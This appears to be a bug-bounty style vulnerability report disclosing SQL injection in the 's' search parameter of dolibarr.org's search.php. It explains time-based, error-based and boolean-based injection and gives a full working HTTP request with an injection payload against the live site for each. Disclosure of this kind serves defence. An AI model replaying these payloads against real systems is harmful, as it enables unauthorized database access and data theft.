Description

I have found 3 types of SQLi on the s parameter

Proof of Concept

Time-Based

Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE.
Depending on the result, an HTTP response will be returned with a delay, or returned immediately. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned. This attack is typically slow (especially on large databases) since an attacker would need to enumerate a database character by character.

• Send this request and it will come after 10 seconds!

GET /search.php?s=%27)%20AND%20(SELECT%209569%20FROM%20(SELECT(SLEEP(10)))jsCH)--%20gYso HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers

Error-Based

Error-based SQLi is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database. In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database. While errors are very useful during the development phase of a web application, they should be disabled on a live site or logged to a file with restricted access instead.

• Also, send this and it will make a SQL error!

GET /search.php?s=')+AND+EXTRACTVALUE(5960,CONCAT(0x5c,0x7171626271,(SELECT+(ELT(5960%3d5960,1))),0x7171766b71))--+Vmlg HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers

Boolean-Based

Boolean-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result.
Depending on the result, the content within the HTTP response will change, or remain the same. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned. This attack is typically slow (especially on large databases) since an attacker would need to enumerate a database, character by character.

GET /search.php?s=3893')+OR+9606%3d9606--+aLaa HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers